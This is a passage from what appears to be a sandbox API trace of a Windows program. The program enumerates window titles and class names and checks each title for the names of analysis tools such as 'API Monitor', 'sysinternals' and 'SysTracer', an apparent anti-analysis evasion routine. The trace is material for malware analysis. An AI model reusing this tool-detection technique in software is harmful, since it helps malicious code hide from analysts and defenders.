| out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.731] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.731] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.731] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.731] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.731] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.731] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.732] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.732] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.732] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.732] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.732] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.732] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.732] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.732] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.732] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.732] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.732] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65976") returned 5 [0158.732] lstrcpyA (in: lpString1=0x430400, 
lpString2="65976" | out: lpString1="65976") returned="65976" [0158.732] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.732] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.732] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.732] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.733] GetWindowTextA (in: hWnd=0x101b8, lpString=0x340df8, nMaxCount=1024 | out: lpString="OfficePowerManagerWindow") returned 24 [0158.733] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.733] lstrcpynA (in: lpString1=0x3401e0, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] lstrcpyA (in: lpString1=0x430800, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65976") returned 5 [0158.733] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.733] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.733] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.733] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0158.733] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.733] lstrcpynA (in: lpString1=0x341200, lpString2="OfficePowerManagerWindow", iMaxLength=1024 | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] lstrcpyA (in: 
lpString1=0x430c00, lpString2="OfficePowerManagerWindow" | out: lpString1="OfficePowerManagerWindow") returned="OfficePowerManagerWindow" [0158.733] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65976") returned 5 [0158.733] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.733] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.734] strstr (_Str="OfficePowerManagerWindow", _SubStr="- main thread") returned 0x0 [0158.734] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.734] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.734] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.734] strstr (_Str="OfficePowerManagerWindow", _SubStr="API Monitor") returned 0x0 [0158.734] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.734] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.734] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.734] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.734] strstr (_Str="OfficePowerManagerWindow", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.734] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.734] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: 
lpString1="0") returned="0" [0158.735] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.735] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.735] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.735] strstr (_Str="OfficePowerManagerWindow", _SubStr="sysinternals") returned 0x0 [0158.735] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.735] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.735] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.735] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.735] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131504") returned 6 [0158.735] lstrcpyA (in: lpString1=0x430400, lpString2="131504" | out: lpString1="131504") returned="131504" [0158.735] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.735] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.735] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.735] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.735] GetWindowTextA (in: hWnd=0x201b0, lpString=0x3401e0, nMaxCount=1024 | out: lpString="GDI+ Window") returned 11 [0158.736] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.736] lstrcpynA (in: lpString1=0x340df8, lpString2="GDI+ Window", iMaxLength=1024 | out: lpString1="GDI+ Window") returned="GDI+ Window" [0158.736] lstrcpyA (in: lpString1=0x430800, lpString2="GDI+ Window" | out: lpString1="GDI+ Window") returned="GDI+ Window" [0158.736] wsprintfA 
(in: param_1=0x340df8, param_2="%d" | out: param_1="131504") returned 6 [0158.736] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.736] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.736] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.736] GetClassNameA (in: hWnd=0x201b0, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0158.736] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.736] lstrcpynA (in: lpString1=0x341200, lpString2="GDI+ Hook Window Class", iMaxLength=1024 | out: lpString1="GDI+ Hook Window Class") returned="GDI+ Hook Window Class" [0158.736] lstrcpyA (in: lpString1=0x430c00, lpString2="GDI+ Hook Window Class" | out: lpString1="GDI+ Hook Window Class") returned="GDI+ Hook Window Class" [0158.736] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131504") returned 6 [0158.736] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.736] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.736] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.737] strstr (_Str="GDI+ Window", _SubStr="- main thread") returned 0x0 [0158.737] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.737] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.737] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.737] strstr 
(_Str="GDI+ Window", _SubStr="API Monitor") returned 0x0 [0158.737] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.737] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.737] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.737] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.737] strstr (_Str="GDI+ Window", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.737] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.737] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.738] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.738] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.738] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.738] strstr (_Str="GDI+ Window", _SubStr="sysinternals") returned 0x0 [0158.738] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.738] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.738] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.738] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.738] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131498") returned 6 [0158.738] lstrcpyA (in: lpString1=0x430400, lpString2="131498" | out: lpString1="131498") returned="131498" [0158.738] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.738] lstrcpyA (in: lpString1=0x341200, 
lpString2="user32" | out: lpString1="user32") returned="user32" [0158.738] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.738] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.738] GetWindowTextA (in: hWnd=0x201aa, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.738] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.739] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.739] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.739] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131498") returned 6 [0158.739] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.739] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.739] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.739] GetClassNameA (in: hWnd=0x201aa, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="ARC Window Class") returned 16 [0158.739] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.739] lstrcpynA (in: lpString1=0x341200, lpString2="ARC Window Class", iMaxLength=1024 | out: lpString1="ARC Window Class") returned="ARC Window Class" [0158.739] lstrcpyA (in: lpString1=0x430c00, lpString2="ARC Window Class" | out: lpString1="ARC Window Class") returned="ARC Window Class" [0158.739] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131498") returned 6 [0158.739] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.739] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.739] lstrcpyA (in: 
lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.739] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.740] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.740] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.740] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.740] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.740] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.740] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.740] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.740] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.740] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.740] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.740] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.740] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.741] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.741] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.741] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.741] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.741] lstrcpyA (in: 
lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.741] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.741] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.741] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65944") returned 5 [0158.741] lstrcpyA (in: lpString1=0x430400, lpString2="65944" | out: lpString1="65944") returned="65944" [0158.741] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.741] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.741] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.741] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.741] GetWindowTextA (in: hWnd=0x10198, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Psychology Leaving Examinations") returned 31 [0158.741] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.742] lstrcpynA (in: lpString1=0x340df8, lpString2="Psychology Leaving Examinations", iMaxLength=1024 | out: lpString1="Psychology Leaving Examinations") returned="Psychology Leaving Examinations" [0158.742] lstrcpyA (in: lpString1=0x430800, lpString2="Psychology Leaving Examinations" | out: lpString1="Psychology Leaving Examinations") returned="Psychology Leaving Examinations" [0158.742] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65944") returned 5 [0158.742] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.742] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.742] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" 
[0158.742] GetClassNameA (in: hWnd=0x10198, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="psychology_leaving_examinations_window") returned 38 [0158.742] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.742] lstrcpynA (in: lpString1=0x341200, lpString2="psychology_leaving_examinations_window", iMaxLength=1024 | out: lpString1="psychology_leaving_examinations_window") returned="psychology_leaving_examinations_window" [0158.742] lstrcpyA (in: lpString1=0x430c00, lpString2="psychology_leaving_examinations_window" | out: lpString1="psychology_leaving_examinations_window") returned="psychology_leaving_examinations_window" [0158.742] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65944") returned 5 [0158.742] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.742] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.742] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.742] strstr (_Str="Psychology Leaving Examinations", _SubStr="- main thread") returned 0x0 [0158.743] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.743] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.743] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.743] strstr (_Str="Psychology Leaving Examinations", _SubStr="API Monitor") returned 0x0 [0158.743] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.743] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.743] lstrcpyA (in: 
lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.743] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.743] strstr (_Str="Psychology Leaving Examinations", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.743] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.743] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.743] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.744] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.744] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.744] strstr (_Str="Psychology Leaving Examinations", _SubStr="sysinternals") returned 0x0 [0158.744] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.744] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.744] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.744] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.744] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="197132") returned 6 [0158.744] lstrcpyA (in: lpString1=0x430400, lpString2="197132" | out: lpString1="197132") returned="197132" [0158.744] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.744] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.744] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.744] lstrcpyA (in: lpString1=0x327e20, 
lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.744] GetWindowTextA (in: hWnd=0x3020c, lpString=0x340df8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0158.744] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.744] lstrcpynA (in: lpString1=0x3401e0, lpString2="DDE Server Window", iMaxLength=1024 | out: lpString1="DDE Server Window") returned="DDE Server Window" [0158.745] lstrcpyA (in: lpString1=0x430800, lpString2="DDE Server Window" | out: lpString1="DDE Server Window") returned="DDE Server Window" [0158.745] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="197132") returned 6 [0158.745] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.745] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.745] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.745] GetClassNameA (in: hWnd=0x3020c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0158.745] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.745] lstrcpynA (in: lpString1=0x341200, lpString2="OleDdeWndClass", iMaxLength=1024 | out: lpString1="OleDdeWndClass") returned="OleDdeWndClass" [0158.745] lstrcpyA (in: lpString1=0x430c00, lpString2="OleDdeWndClass" | out: lpString1="OleDdeWndClass") returned="OleDdeWndClass" [0158.745] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="197132") returned 6 [0158.745] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.745] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.745] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.745] strstr (_Str="DDE Server 
Window", _SubStr="- main thread") returned 0x0 [0158.745] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.745] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.746] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.746] strstr (_Str="DDE Server Window", _SubStr="API Monitor") returned 0x0 [0158.746] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.746] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.746] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.746] strstr (_Str="DDE Server Window", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.746] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.746] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.746] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.746] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.747] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.747] strstr (_Str="DDE Server Window", _SubStr="sysinternals") returned 0x0 [0158.747] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.747] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") 
returned="0" [0158.747] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.747] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.747] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131590") returned 6 [0158.747] lstrcpyA (in: lpString1=0x430400, lpString2="131590" | out: lpString1="131590") returned="131590" [0158.747] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.747] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.747] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.747] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.747] GetWindowTextA (in: hWnd=0x20206, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.747] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.747] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.747] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.747] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131590") returned 6 [0158.748] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.748] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.748] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.748] GetClassNameA (in: hWnd=0x20206, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ComboLBox") returned 9 [0158.748] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.748] lstrcpynA (in: lpString1=0x341200, 
lpString2="ComboLBox", iMaxLength=1024 | out: lpString1="ComboLBox") returned="ComboLBox" [0158.748] lstrcpyA (in: lpString1=0x430c00, lpString2="ComboLBox" | out: lpString1="ComboLBox") returned="ComboLBox" [0158.748] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131590") returned 6 [0158.748] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.748] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.748] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.748] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.748] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.748] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.749] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.749] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.749] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.749] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.749] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.749] lstrcpyA (in: lpString1=0x340df8, 